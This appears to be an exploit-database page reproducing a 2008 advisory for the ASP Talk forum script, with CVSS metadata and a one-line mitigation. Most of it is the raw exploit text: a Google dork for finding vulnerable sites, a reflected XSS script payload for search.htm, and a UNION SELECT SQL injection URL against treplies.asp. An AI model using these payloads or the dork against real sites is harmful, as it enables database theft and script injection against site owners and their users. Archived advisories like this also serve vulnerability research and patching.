header-logo
Suggest Exploit
vendor:
ASP Talk
by:
blackbeard-sql
8.8
CVSS
HIGH
Multiple Exploits (SQL/CSS)
79 (XSS) and 89 (SQL Injection)
CWE
Product Name: ASP Talk
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ASP Talk

The vulnerability is a Cross Site Scripting (XSS) and Remote SQL Injection vulnerability. The XSS vulnerability can be exploited by sending a malicious script in the post parameter. The Remote SQL Injection vulnerability can be exploited by sending a malicious payload in the message parameter.

Mitigation:

Input validation and sanitization should be done to prevent XSS and SQL Injection attacks.
Source

Exploit-DB raw data:

000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000



[+] Script               : ASP Talk 

[+] Exploit Type         : Multiple Exploits (SQL/CSS)

[+] Google Dork          : inurl:treplies.asp?message=     intitle:ASP Talk

[+] Contact              : blackbeard-sql A.T hotmail.fr 

--//--> Exploit : 

1)Cross site scripting :

http://[website]/[script]/search.htm

post = <script>alert('Bl@clbe@rD Is Here')</script>

2) Remote sql injection Exploit :

http://[website]/[script]/treplies.asp?message=20814+union+select+1,2,3,4,5,6,7,8+from+msysobjects

[peace xD]

# milw0rm.com [2008-12-07]